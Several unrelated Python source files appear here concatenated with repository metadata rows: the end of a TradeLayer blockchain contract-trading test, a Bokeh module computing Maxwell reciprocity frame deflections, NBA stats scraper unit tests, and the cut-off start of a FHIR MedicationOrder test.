assert_equal(out['error'], None)
self.nodes[0].generate(1)
self.log.info("Checking orderbook again (buy side)")
params = str(["ALL/Lhk", 1]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_getcontract_orderbook",params)
# self.log.info(out)
assert_equal(out['error'], None)
assert_equal(out['result'][0]['address'], addresses[0])
assert_equal(out['result'][0]['contractid'], 5)
assert_equal(out['result'][0]['amountforsale'], 1000)
assert_equal(out['result'][0]['tradingaction'], 1)
assert_equal(out['result'][0]['effectiveprice'], '200.30000000')
assert_equal(out['result'][0]['block'], 233)
assert_equal(out['result'][0]['idx'], 1)
assert_equal(out['result'][1]['address'], addresses[0])
assert_equal(out['result'][1]['contractid'], 5)
assert_equal(out['result'][1]['amountforsale'], 1000)
assert_equal(out['result'][1]['tradingaction'], 1)
assert_equal(out['result'][1]['effectiveprice'], '200.30000000')
assert_equal(out['result'][1]['block'], 233)
assert_equal(out['result'][1]['idx'], 2)
assert_equal(out['result'][2]['address'], addresses[0])
assert_equal(out['result'][2]['contractid'], 5)
assert_equal(out['result'][2]['amountforsale'], 1000)
assert_equal(out['result'][2]['tradingaction'], 1)
assert_equal(out['result'][2]['effectiveprice'], '200.30000000')
assert_equal(out['result'][2]['block'], 233)
assert_equal(out['result'][2]['idx'], 3)
assert_equal(out['result'][3]['address'], addresses[0])
assert_equal(out['result'][3]['contractid'], 5)
assert_equal(out['result'][3]['amountforsale'], 1000)
assert_equal(out['result'][3]['tradingaction'], 1)
assert_equal(out['result'][3]['effectiveprice'], '200.30000000')
assert_equal(out['result'][3]['block'], 233)
assert_equal(out['result'][3]['idx'], 4)
assert_equal(out['result'][4]['address'], addresses[0])
assert_equal(out['result'][4]['contractid'], 5)
assert_equal(out['result'][4]['amountforsale'], 1000)
assert_equal(out['result'][4]['tradingaction'], 1)
assert_equal(out['result'][4]['effectiveprice'], '200.30000000')
assert_equal(out['result'][4]['block'], 233)
assert_equal(out['result'][4]['idx'], 5)
params = str([addresses[1], "ALL/Lhk", "1000", "200.3", 2, "1"]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_tradecontract",params)
# self.log.info(out)
assert_equal(out['error'], None)
self.nodes[0].generate(1)
self.log.info("Checking orderbook again (buy side)")
params = str(["ALL/Lhk", 1]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_getcontract_orderbook",params)
# self.log.info(out)
assert_equal(out['result'][0]['address'], addresses[0])
assert_equal(out['result'][0]['contractid'], 5)
assert_equal(out['result'][0]['amountforsale'], 1000)
assert_equal(out['result'][0]['tradingaction'], 1)
assert_equal(out['result'][0]['effectiveprice'], '200.30000000')
assert_equal(out['result'][0]['block'], 233)
assert_equal(out['result'][0]['idx'], 2)
assert_equal(out['result'][1]['address'], addresses[0])
assert_equal(out['result'][1]['contractid'], 5)
assert_equal(out['result'][1]['amountforsale'], 1000)
assert_equal(out['result'][1]['tradingaction'], 1)
assert_equal(out['result'][1]['effectiveprice'], '200.30000000')
assert_equal(out['result'][1]['block'], 233)
assert_equal(out['result'][1]['idx'], 3)
assert_equal(out['result'][2]['address'], addresses[0])
assert_equal(out['result'][2]['contractid'], 5)
assert_equal(out['result'][2]['amountforsale'], 1000)
assert_equal(out['result'][2]['tradingaction'], 1)
assert_equal(out['result'][2]['effectiveprice'], '200.30000000')
assert_equal(out['result'][2]['block'], 233)
assert_equal(out['result'][2]['idx'], 4)
assert_equal(out['result'][3]['address'], addresses[0])
assert_equal(out['result'][3]['contractid'], 5)
assert_equal(out['result'][3]['amountforsale'], 1000)
assert_equal(out['result'][3]['tradingaction'], 1)
assert_equal(out['result'][3]['effectiveprice'], '200.30000000')
assert_equal(out['result'][3]['block'], 233)
assert_equal(out['result'][3]['idx'], 5)
self.log.info("Cleaning orderbook")
params = str([addresses[0], "ALL/Lhk"]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, False, "tl_cancelallcontractsbyaddress",params)
# self.log.info(out)
assert_equal(out['error'], None)
self.nodes[0].generate(1)
self.log.info("Checking orderbook again")
params = str(["ALL/Lhk", 1]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_getcontract_orderbook",params)
# self.log.info(out)
assert_equal(out['result'], [])
self.log.info("Testing trades after contract deadline")
for i in range(5):
self.nodes[0].generate(200)
params = str([addresses[0], "ALL/Lhk", "1000", "200.3", 1, "1"]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_tradecontract",params)
assert_equal(out['error'], None)
self.nodes[0].generate(1)
self.log.info("Checking orderbook empty")
params = str(["ALL/Lhk", 1]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_getcontract_orderbook",params)
# self.log.info(out)
assert_equal(out['result'], [])
self.log.info("Checking all positions")
params = str([addresses[0], "ALL/Lhk"]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_getposition",params)
# self.log.info(out)
assert_equal(out['error'], None)
assert_equal(out['result']['position'], 1500)
params = str([addresses[1], "ALL/Lhk"]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_getposition",params)
# self.log.info(out)
assert_equal(out['error'], None)
assert_equal(out['result']['position'], -2500)
params = str([addresses[2], "ALL/Lhk"]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_getposition",params)
# self.log.info(out)
assert_equal(out['error'], None)
assert_equal(out['result']['position'], 1000)
self.log.info("Checking the open interest")
params = str(["ALL/Lhk"]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_getopen_interest",params)
# self.log.info(out)
assert_equal(out['error'], None)
assert_equal(out['result']['totalLives'], 2500)
conn.close()
self.stop_nodes()
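# Note (illustrative): the params strings above are built with
# str([...]).replace("'", '"'), which only produces valid JSON while no value
# contains an apostrophe. A more robust equivalent, assuming the same
# tradelayer_HTTP interface, would be:
#
#   import json
#   params = json.dumps([addresses[0], "ALL/Lhk", "1000", "200.3", 1, "1"])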
if __name__ == '__main__':
    NativesBasicsTest().main()
| 42.730237 | 128 | 0.594871 | 5,223 | 43,243 | 4.814474 | 0.060502 | 0.143045 | 0.1815 | 0.192476 | 0.889644 | 0.86992 | 0.851467 | 0.831265 | 0.821801 | 0.813768 | 0 | 0.045913 | 0.209745 | 43,243 | 1,011 | 129 | 42.772502 | 0.689872 | 0.067063 | 0 | 0.739583 | 0 | 0 | 0.246505 | 0.024663 | 0 | 0 | 0 | 0 | 0.479167 | 1 | 0.004464 | false | 0.002976 | 0.008929 | 0 | 0.014881 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
7383d50506628290ce7d3154dee0f9e1de83fc06 | 8,243 | py | Python | Maxwell_Reciprocity/Maxwell_Functions_Side.py | ChairOfStructuralMechanicsTUM/Mechanics_Apps | b064a42d4df3fa9bde62a5cff9cb27ca61b0127c | [
"MIT"
] | 11 | 2017-05-06T17:05:29.000Z | 2020-11-12T09:26:47.000Z | Maxwell_Reciprocity/Maxwell_Functions_Side.py | ChairOfStructuralMechanicsTUM/Mechanics_Apps | b064a42d4df3fa9bde62a5cff9cb27ca61b0127c | [
"MIT"
] | 49 | 2017-04-20T11:26:11.000Z | 2020-05-29T13:18:06.000Z | Maxwell_Reciprocity/Maxwell_Functions_Side.py | ChairOfStructuralMechanicsTUM/Mechanics_Apps | b064a42d4df3fa9bde62a5cff9cb27ca61b0127c | [
"MIT"
] | 4 | 2017-02-14T12:55:34.000Z | 2022-01-12T15:07:07.000Z | import Maxwell_Constants as glc
################################################################################
### all three side functions
################################################################################
def side1(f,paramInt,i):
    '''Calculates the deformation of the left hand side (side1) for a point
    load of magnitude i applied at height d2 = (paramInt/30)*a. The (d13-d2)**3
    terms below are Macaulay (singularity-function) contributions that switch
    on past the load point. Obtained from Java code.'''
x1 = []
x2 = []
x3 = []
y1 = []
y2 = []
y3 = []
    d1 = i / glc.FScale  # load scaled to drawing units
    d7 = 0.8             # working x coordinate of the current point
    d8 = 0.1             # working y coordinate of the current point
    # d2: load position along side 1, d3 = a - d2 the remaining length;
    # d4-d6: integration constants of the deflection curves, set below
    d2 = 0
    d3 = 0
    d5 = 0
    d4 = 0
    d6 = 0
    d9 = 0
    d12 = 0
    d13 = 0
#change arrow:
if (i<0):
# f.arrow_source.data = dict(xS= [0.12-i/glc.arr_scal], xE= [0.12],
#yS= [0.1 + paramInt*(1.0/60)], yE=[0.1+ paramInt*(1.0/60)], lW = [abs(i/glc.arr_scal)] )
f.arrow_source.stream(dict(xS= [0.12-i/glc.arr_scal], xE= [0.12],
yS= [0.1 + paramInt*(1.0/60)], yE=[0.1+ paramInt*(1.0/60)], lW = [abs(i/glc.arr_scal)]),rollover=1)
f.label.data = dict(x = [0.12-i/glc.arr_scal], y = [0.1+ paramInt*(1.0/60)], name = [f.name])
elif i>0:
#f.arrow_source.data = dict(xS= [0.08-i/glc.arr_scal], xE= [0.08],
#yS= [0.1 + paramInt*(1.0/60)], yE=[0.1+ paramInt*(1.0/60)], lW = [abs(i/glc.arr_scal)] )
f.arrow_source.stream(dict(xS= [0.08-i/glc.arr_scal], xE= [0.08],
yS= [0.1 + paramInt*(1.0/60)], yE=[0.1+ paramInt*(1.0/60)], lW = [abs(i/glc.arr_scal)]),rollover=1)
f.label.data = dict(x = [0.08-i/glc.arr_scal], y = [0.1+ paramInt*(1.0/60)], name = [f.name])
else:
f.label.data = dict(x = [0.03-i/glc.arr_scal], y = [0.1+ paramInt*(1.0/60)], name = [f.name])
d2 = (paramInt / 30.0) * glc.a
d3 = glc.a - d2
d5 = (-1/3.0) * d1 * d2 * glc.b
d4 = -d5 + ( (d1 / 2.0) * glc.a * glc.a ) - ( (d1 / 2.0) * d3 * d3)
d6 = d1 * d2 * (glc.b / 2.0) + d5
d9 = glc.a / 4.0
d11 = 0.1
d12 = 0.1
d7 = 0.0
d8 = 0.0
for j in range(1,5):
d13 = j * d9
d8 = d13 + d12
if (d13 < d2):
d7 = (-1.0/6.0) * (d1 * d13 * d13 * d13) + (d4 * d13) + d11
else:
d7 = (-1.0/6.0) * (d1 * d13 * d13 * d13) + (d4 * d13) + (1.0/6.0) * (d1 * ( (d13 - d2)**3 ) ) + d11
x1.append(d7)
y1.append(d8)
d11 = d7
d12 = d8
d9 = glc.b / 4.0
for j in range(0,5):
d13 = j * d9
d7 = d13 + d11
d8 = (0.5 * d1 * d2 * d13 * d13) - ( (1.0/6.0) * d1 * (d2 / glc.b) * (d13**3.0) ) + (d5 * d13) + d12
x2.append(d7)
y2.append(d8)
d11 = d7
d12 = d8
d9 = glc.a/4.0
for j in range(0,5):
d13 = j * d9
d8 = d12 - d13
d7 = d11 + (d6 * d13)
x3.append(d7)
y3.append(d8)
#output:
x = [0.1] + x1 + x2 + x3
y = [0.1] + y1 + y2 + y3
f.pts.data = dict(x = x, y = y ) #updates the frame of object f
def side2(f,paramInt,i):
'''Calculates the deformations of the top of the frame (side 2)'''
x1 = []
x2 = []
x3 = []
y1 = []
y2 = []
y3 = []
#add arrow changing function here
#change arrow:
if i<0:
#f.arrow_source.data = dict(xS= [0.1 + (paramInt-30)*(0.0175)], xE= [0.1 + (paramInt-30)*(0.0175)],
#yS= [0.58+i/glc.arr_scal], yE=[0.58], lW = [abs(i/glc.arr_scal)] )
f.arrow_source.stream(dict(xS= [0.1 + (paramInt-30)*(0.0175)], xE= [0.1 + (paramInt-30)*(0.0175)],
yS= [0.58+i/glc.arr_scal], yE=[0.58], lW = [abs(i/glc.arr_scal)] ),rollover=1)
f.label.data = dict(x = [0.1 + (paramInt-30)*(0.0175)], y = [0.58+i/glc.arr_scal], name = [f.name])
elif i>0:
#f.arrow_source.data = dict(xS= [0.1 + (paramInt-30)*(0.0175)], xE= [0.1 + (paramInt-30)*(0.0175)],
#yS= [0.62+i/glc.arr_scal], yE=[0.62], lW = [abs(i/glc.arr_scal)] )
f.arrow_source.stream(dict(xS= [0.1 + (paramInt-30)*(0.0175)], xE= [0.1 + (paramInt-30)*(0.0175)],
yS= [0.62+i/glc.arr_scal], yE=[0.62], lW = [abs(i/glc.arr_scal)] ),rollover=1)
f.label.data = dict(x = [0.1 + (paramInt-30)*(0.0175)], y = [0.62+i/glc.arr_scal], name = [f.name])
else:
f.label.data = dict(x = [0.1 + (paramInt-30)*(0.0175)], y = [0.62+i/glc.arr_scal], name = [f.name])
d1 = i / glc.FScale
d10 = 0
d14 = 0
d9 = (paramInt - 30) / 40.0 * glc.b
d5 = (d1 / 6.0) * ( ( (glc.b - d9)**3.0 ) - ( (glc.b - d9) * glc.b ) )
d4 = -d5
d6 = (d1 / 2.0) * ( ((glc.b - d9) * glc.b) - ((glc.b - d9)**2) ) + d5
d10 = glc.a / 4.0
d12 = 0.1
d13 = 0.1
d7 = 0
d8 = 0
for k in range(1,5):
d14 = k * d10
d8 = d13 + d14
d7 = (d4 * d14) + d12
x1.append(d7)
y1.append(d8)
d12 = d7
d13 = d8
d10 = glc.b/4.0
for k in range(1,5):
d14 = k * d10
d7 = d14 + d12
if (d14 < d9):
d8 = d13 + (d1 / 6.0) * ( (glc.b - d9) / glc.b ) * d14 * d14 * d14 + (d5 * d14)
else:
d8 = d13 + d1 / 6.0 * (glc.b - d9) / glc.b * d14 * d14 * d14 + d5 * d14 - d1 / 6.0 * ((d14 - d9)**3.0)
x2.append(d7)
y2.append(d8)
d12 = d7
d13 = d8
d10 = glc.a/4.0
for k in range(1,5):
d14 = k * d10
d8 = d13 - d14
d7 = d12 + d6 * d14
x3.append(d7)
y3.append(d8)
#output:
x = [0.1] + x1 + x2 + x3
y = [0.1] + y1 + y2 + y3
f.pts.data = dict(x = x, y = y )
def side3(f, paramInt, i):
    '''Calculates the deformation of the right hand side (side 3)'''
    x1 = []
    x2 = []
    x3 = []
    y1 = []
    y2 = []
    y3 = []
    # Redraw the load arrow and its label on the right-hand column.
    if i < 0:
        f.arrow_source.stream(dict(xS=[0.78+i/glc.arr_scal], xE=[0.78],
                                   yS=[0.6 - (paramInt%70)*(1.0/60)], yE=[0.6 - (paramInt%70)*(1.0/60)], lW=[abs(i/glc.arr_scal)]), rollover=1)
        f.label.data = dict(x=[0.78+i/glc.arr_scal], y=[0.6 - (paramInt%70)*(1.0/60)], name=[f.name])
    elif i > 0:
        f.arrow_source.stream(dict(xS=[0.82+i/glc.arr_scal], xE=[0.82],
                                   yS=[0.6 - (paramInt%70)*(1.0/60)], yE=[0.6 - (paramInt%70)*(1.0/60)], lW=[abs(i/glc.arr_scal)]), rollover=1)
        f.label.data = dict(x=[0.82+i/glc.arr_scal], y=[0.6 - (paramInt%70)*(1.0/60)], name=[f.name])
    else:
        f.label.data = dict(x=[0.82+i/glc.arr_scal], y=[0.6 - (paramInt%70)*(1.0/60)], name=[f.name])
    # Scaled load, load position d2 up the right column, and constants.
    d1 = i / glc.FScale
    d2 = (100 - paramInt) / 30.0 * glc.a
    d3 = glc.a - d2
    d9 = d1 * d2 / glc.b
    d5 = 10 / glc.b * (d1 * glc.a / 20 * glc.b * glc.b - d9 * glc.b * glc.b * glc.b / 60)
    d4 = -d5 - d1 / 2.0 * glc.a * glc.a
    d6 = -d1 * glc.a * glc.b + d9 * glc.b * glc.b / 2.0 + d5
    d10 = glc.a / 4.0
    d12 = 0.1
    d13 = 0.1
    d7 = 0.0
    d8 = 0.0
    # Segment 1: four points up the left column.
    for k in range(1, 5):
        d14 = k * d10
        d8 = d14 + d13
        d7 = d1 / 6.0 * d14 * d14 * d14 + d4 * d14 + d12
        x1.append(d7)
        y1.append(d8)
    d12 = d7
    d13 = d8
    # Segment 2: four points across the top beam.
    d10 = glc.b / 4.0
    for k in range(1, 5):
        d14 = k * d10
        d7 = d14 + d12
        d8 = d13 - d1 * glc.a / 2.0 * d14 * d14 + d9 * d14 * d14 * d14 / 6.0 + d5 * d14
        x2.append(d7)
        y2.append(d8)
    d12 = d7
    d13 = d8
    # Segment 3: four points down the loaded right column, with a cubic
    # correction once d14 passes the load position (measured from the top).
    d10 = glc.a / 4.0
    for k in range(1, 5):
        d14 = k * d10
        d8 = d13 - d14
        if d14 < d3:
            d7 = d12 - d1 * d3 / 2.0 * d14 * d14 + d1 / 6.0 * d14 * d14 * d14 + d6 * d14
        else:
            d7 = d12 - d1 * d3 / 2.0 * d14 * d14 + d1 / 6.0 * d14 * d14 * d14 + d6 * d14 - d1 / 6.0 * ((d14 - d3)**3.0)
        x3.append(d7)
        y3.append(d8)
    # Output: prepend the fixed base point and push to the data source.
    x = [0.1] + x1 + x2 + x3
    y = [0.1] + y1 + y2 + y3
    f.pts.data = dict(x=x, y=y)
| 31.826255 | 120 | 0.436977 | 1,427 | 8,243 | 2.491941 | 0.078486 | 0.040495 | 0.064961 | 0.102081 | 0.834927 | 0.801181 | 0.767154 | 0.745501 | 0.732565 | 0.705849 | 0 | 0.182698 | 0.335315 | 8,243 | 258 | 121 | 31.949612 | 0.466326 | 0.158559 | 0 | 0.647059 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.016043 | false | 0 | 0.005348 | 0 | 0.02139 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
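The side functions above all evaluate the same kind of piecewise cubic: a beam-deflection polynomial whose extra (x - c)**3 term only switches on past the load position (a Macaulay-bracket formulation). A minimal, self-contained sketch of that pattern; the helper name and parameters are illustrative assumptions, not part of the original file:

def macaulay_deflection(x, load, c, c1, offset):
    # Deflection at station x for a scaled point load applied at c;
    # c1 is the integration constant and offset the previous segment's end.
    v = (-1.0 / 6.0) * load * x**3 + c1 * x + offset
    if x >= c:
        # Past the load, the (x - c)**3 term starts contributing.
        v += (1.0 / 6.0) * load * (x - c)**3
    return v

# Example: sample four stations along a member of length 1.0 loaded at 0.4.
points = [macaulay_deflection(j * 0.25, 1.0, 0.4, 0.05, 0.1) for j in range(1, 5)]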
73e51ae97694b3ff1934f56f3c77f1f890801768 | 9,533 | py | Python | NBAStatScraper/test/test_players.py | tdowhy/NBAStatScraper | eef1fa8ebb39d9e36ca137f1200957c9f4406000 | [
"MIT"
] | null | null | null | NBAStatScraper/test/test_players.py | tdowhy/NBAStatScraper | eef1fa8ebb39d9e36ca137f1200957c9f4406000 | [
"MIT"
] | null | null | null | NBAStatScraper/test/test_players.py | tdowhy/NBAStatScraper | eef1fa8ebb39d9e36ca137f1200957c9f4406000 | [
"MIT"
] | 1 | 2021-01-16T11:19:36.000Z | 2021-01-16T11:19:36.000Z | import unittest
import sys
sys.path.append('../')
import players
class Test(unittest.TestCase):
    def test_get_player_url(self):
        '''
        Test for a player who exists with no duplicate name.
        '''
        name = "James Harden"
        extension = players.get_player_url(name)
        self.assertEqual(extension, ['hardeja01'])
        '''
        Test for a player who exists and name is shorter than 5 characters.
        '''
        name = "Bol Bol"
        extension = players.get_player_url(name)
        self.assertEqual(extension, ['bolbo01'])
        '''
        Test name with multiple results.
        '''
        name = "Chris Johnson"
        extension = players.get_player_url(name)
        self.assertEqual(extension, ['johnsch03', 'johnsch04'])

    @unittest.expectedFailure
    def test_get_player_url_fail(self):
        name = "James Harden"
        extension = players.get_player_url(name)
        self.assertEqual(extension, ['hardeja01', 'hardeja02'])

    def test_get_game_stats(self):
        fields = ['Season', 'Age', 'Tm', 'Lg', 'Pos', 'G', 'GS', 'MP', 'FG', 'FGA', 'FG%',
                  '3P', '3PA', '3P%', '2P', '2PA', '2P%', 'eFG%', 'FT', 'FTA', 'FT%', 'ORB',
                  'DRB', 'TRB', 'AST', 'STL', 'BLK', 'TOV', 'PF', 'PTS']
        measurements = ['game', 'playoffGame']
        for item in measurements:
            name = "tatumja01"
            df = players.get_career_player_stats(name, item)
            self.assertCountEqual(list(df.columns), fields)
            name = "jordami01"
            df = players.get_career_player_stats(name, item)
            self.assertCountEqual(list(df.columns), fields)
            name = "jamesle01"
            df = players.get_career_player_stats(name, item)
            self.assertCountEqual(list(df.columns), fields)

    @unittest.expectedFailure
    def test_game_stats_fail(self):
        name = "dowhyt01"
        fields = ['Season', 'Age', 'Tm', 'Lg', 'Pos', 'G', 'GS', 'MP', 'FG', 'FGA', 'FG%',
                  '3P', '3PA', '3P%', '2P', '2PA', '2P%', 'eFG%', 'FT', 'FTA', 'FT%', 'ORB',
                  'DRB', 'TRB', 'AST', 'STL', 'BLK', 'TOV', 'PF', 'PTS']
        measurements = ['game', 'playoffGame']
        for item in measurements:
            df = players.get_career_player_stats(name, item)
            self.assertCountEqual(list(df.columns), fields)

    def test_total_stats(self):
        fields = ['Season', 'Age', 'Tm', 'Lg', 'Pos', 'G', 'GS', 'MP', 'FG', 'FGA', 'FG%',
                  '3P', '3PA', '3P%', '2P', '2PA', '2P%', 'eFG%', 'FT', 'FTA', 'FT%', 'ORB',
                  'DRB', 'TRB', 'AST', 'STL', 'BLK', 'TOV', 'PF', 'PTS', 'Trp Dbl']
        measurements = ['total', 'playoffTotal']
        for item in measurements:
            name = "hardeja01"
            df = players.get_career_player_stats(name, item)
            self.assertCountEqual(list(df.columns), fields)
            name = "jordami01"
            df = players.get_career_player_stats(name, item)
            self.assertCountEqual(list(df.columns), fields)
            name = "jamesle01"
            df = players.get_career_player_stats(name, item)
            self.assertCountEqual(list(df.columns), fields)

    @unittest.expectedFailure
    def test_total_stats_fail(self):
        name = "dowhyt01"
        fields = ['Season', 'Age', 'Tm', 'Lg', 'Pos', 'G', 'GS', 'MP', 'FG', 'FGA', 'FG%',
                  '3P', '3PA', '3P%', '2P', '2PA', '2P%', 'eFG%', 'FT', 'FTA', 'FT%', 'ORB',
                  'DRB', 'TRB', 'AST', 'STL', 'BLK', 'TOV', 'PF', 'PTS', 'Trp Dbl']
        measurements = ['total', 'playoffTotal']
        for item in measurements:
            df = players.get_career_player_stats(name, item)
            self.assertCountEqual(list(df.columns), fields)

    def test_min_stats(self):
        fields = ['Season', 'Age', 'Tm', 'Lg', 'Pos', 'G', 'GS', 'MP', 'FG', 'FGA', 'FG%',
                  '3P', '3PA', '3P%', '2P', '2PA', '2P%', 'FT', 'FTA', 'FT%', 'ORB',
                  'DRB', 'TRB', 'AST', 'STL', 'BLK', 'TOV', 'PF', 'PTS']
        measurements = ['min', 'playoffMin']
        for item in measurements:
            name = "bealbr01"
            df = players.get_career_player_stats(name, item)
            self.assertCountEqual(list(df.columns), fields)
            name = "jordami01"
            df = players.get_career_player_stats(name, item)
            self.assertCountEqual(list(df.columns), fields)
            name = "jamesle01"
            df = players.get_career_player_stats(name, item)
            self.assertCountEqual(list(df.columns), fields)

    @unittest.expectedFailure
    def test_min_stats_fail(self):
        name = "dowhyt01"
        fields = ['Season', 'Age', 'Tm', 'Lg', 'Pos', 'G', 'GS', 'MP', 'FG', 'FGA', 'FG%',
                  '3P', '3PA', '3P%', '2P', '2PA', '2P%', 'FT', 'FTA', 'FT%', 'ORB',
                  'DRB', 'TRB', 'AST', 'STL', 'BLK', 'TOV', 'PF', 'PTS']
        measurements = ['min', 'playoffMin']
        for item in measurements:
            df = players.get_career_player_stats(name, item)
            self.assertCountEqual(list(df.columns), fields)

    def test_pos_stats(self):
        fields = ['Season', 'Age', 'Tm', 'Lg', 'Pos', 'G', 'GS', 'MP', 'FG', 'FGA', 'FG%',
                  '3P', '3PA', '3P%', '2P', '2PA', '2P%', 'FT', 'FTA', 'FT%', 'ORB',
                  'DRB', 'TRB', 'AST', 'STL', 'BLK', 'TOV', 'PF', 'PTS', 'ORtg', 'DRtg']
        measurements = ['pos', 'playoffPos']
        for item in measurements:
            name = "bealbr01"
            df = players.get_career_player_stats(name, item)
            self.assertCountEqual(list(df.columns), fields)
            name = "jordami01"
            df = players.get_career_player_stats(name, item)
            self.assertCountEqual(list(df.columns), fields)
            name = "jamesle01"
            df = players.get_career_player_stats(name, item)
            self.assertCountEqual(list(df.columns), fields)

    @unittest.expectedFailure
    def test_pos_stats_fail(self):
        name = "dowhyt01"
        fields = ['Season', 'Age', 'Tm', 'Lg', 'Pos', 'G', 'GS', 'MP', 'FG', 'FGA', 'FG%',
                  '3P', '3PA', '3P%', '2P', '2PA', '2P%', 'FT', 'FTA', 'FT%', 'ORB',
                  'DRB', 'TRB', 'AST', 'STL', 'BLK', 'TOV', 'PF', 'PTS', 'ORtg', 'DRtg']
        measurements = ['pos', 'playoffPos']  # was ['min', 'playoffMin'], presumably a copy-paste slip
        for item in measurements:
            df = players.get_career_player_stats(name, item)
            self.assertCountEqual(list(df.columns), fields)

    def test_shooting_stats(self):
        fields = ['Season', 'Age', 'Tm', 'Lg', 'Pos', 'G', 'MP', 'FG%', 'Dist.', '2P', '0-3', '3-10',
                  '10-16', '16-3P', '3P', '2P', '0-3', '3-10', '10-16', '16-3P', '3P', '2P', '3P', '%FGA',
                  '#', '%3PA', '3P%', 'Att.', '#']
        measurements = ['shooting', 'playoffShooting']
        for item in measurements:
            name = "bealbr01"
            df = players.get_career_player_stats(name, item)
            self.assertCountEqual(list(df.columns), fields)
            name = "jordami01"
            df = players.get_career_player_stats(name, item)
            self.assertCountEqual(list(df.columns), fields)
            name = "jamesle01"
            df = players.get_career_player_stats(name, item)
            self.assertCountEqual(list(df.columns), fields)

    @unittest.expectedFailure
    def test_shooting_stats_fail(self):
        name = "dowhyt01"
        fields = ['Season', 'Age', 'Tm', 'Lg', 'Pos', 'G', 'MP', 'FG%', 'Dist', '2P', '0-3', '3-10',
                  '10-16', '16-3P', '3P', '2P', '0-3', '3-10', '10-16', '16-3P', '3P', '2P', '3P', '%FGA',
                  '#', '%3PA', '3P%', 'Att.', '#']
        measurements = ['shooting', 'playoffShooting']
        for item in measurements:
            df = players.get_career_player_stats(name, item)
            self.assertCountEqual(list(df.columns), fields)

    def test_career_highs(self):
        fields = ['Season', 'Age', 'Tm', 'Lg', 'MP', 'FG', 'FGA',
                  '3P', '3PA', '2P', '2PA', 'FT', 'FTA', 'ORB',
                  'DRB', 'TRB', 'AST', 'STL', 'BLK', 'TOV', 'PF', 'PTS', 'GmSc']
        measurements = ['careerHighs', 'playoffCareerHighs']
        for item in measurements:
            name = "bealbr01"
            df = players.get_career_player_stats(name, item)
            self.assertCountEqual(list(df.columns), fields)
            name = "jordami01"
            df = players.get_career_player_stats(name, item)
            self.assertCountEqual(list(df.columns), fields)
            name = "jamesle01"
            df = players.get_career_player_stats(name, item)
            self.assertCountEqual(list(df.columns), fields)

    @unittest.expectedFailure
    def test_career_highs_fail(self):
        name = "dowhyt01"
        fields = ['Season', 'Age', 'Tm', 'Lg', 'MP', 'FG', 'FGA',
                  '3P', '3PA', '2P', '2PA', 'FT', 'FTA', 'ORB',
                  'DRB', 'TRB', 'AST', 'STL', 'BLK', 'TOV', 'PF', 'PTS', 'GmSc']
        measurements = ['careerHighs', 'playoffCareerHighs']
        for item in measurements:
            df = players.get_career_player_stats(name, item)
            self.assertCountEqual(list(df.columns), fields)
if __name__ == '__main__':
    unittest.main()
| 45.395238 | 107 | 0.513689 | 1,034 | 9,533 | 4.61412 | 0.106383 | 0.058688 | 0.060365 | 0.090547 | 0.920981 | 0.911339 | 0.900859 | 0.900859 | 0.900859 | 0.871306 | 0 | 0.027185 | 0.301584 | 9,533 | 210 | 108 | 45.395238 | 0.689396 | 0.005455 | 0 | 0.813953 | 0 | 0 | 0.166996 | 0 | 0 | 0 | 0 | 0 | 0.162791 | 1 | 0.081395 | false | 0 | 0.017442 | 0 | 0.104651 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 11
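These column checks repeat the same per-player loop in every test. A hedged sketch of a behavior-preserving alternative using unittest's subTest (the helper name is an assumption; the player slugs are reused from the tests above):

def check_columns(self, fields, measurements, names=("bealbr01", "jordami01", "jamesle01")):
    # Assumed helper on the Test class: runs every (name, measurement)
    # combination as its own subtest so one failure does not hide the rest.
    for item in measurements:
        for name in names:
            with self.subTest(name=name, measurement=item):
                df = players.get_career_player_stats(name, item)
                self.assertCountEqual(list(df.columns), fields)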
73f6a2f529fcb3dd5046d8126110e01c4c4d7311 | 28,858 | py | Python | fhir/resources/DSTU2/tests/test_medicationorder.py | mmabey/fhir.resources | cc73718e9762c04726cd7de240c8f2dd5313cbe1 | [
"BSD-3-Clause"
] | null | null | null | fhir/resources/DSTU2/tests/test_medicationorder.py | mmabey/fhir.resources | cc73718e9762c04726cd7de240c8f2dd5313cbe1 | [
"BSD-3-Clause"
] | null | null | null | fhir/resources/DSTU2/tests/test_medicationorder.py | mmabey/fhir.resources | cc73718e9762c04726cd7de240c8f2dd5313cbe1 | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Generated from FHIR 1.0.2.7202 on 2019-05-14.
# 2019, SMART Health IT.
import io
import json
import os
import unittest
from . import medicationorder
from .fhirdate import FHIRDate
class MedicationOrderTests(unittest.TestCase):
    def instantiate_from(self, filename):
        datadir = os.environ.get("FHIR_UNITTEST_DATADIR") or ""
        with io.open(os.path.join(datadir, filename), "r", encoding="utf-8") as handle:
            js = json.load(handle)
            self.assertEqual("MedicationOrder", js["resourceType"])
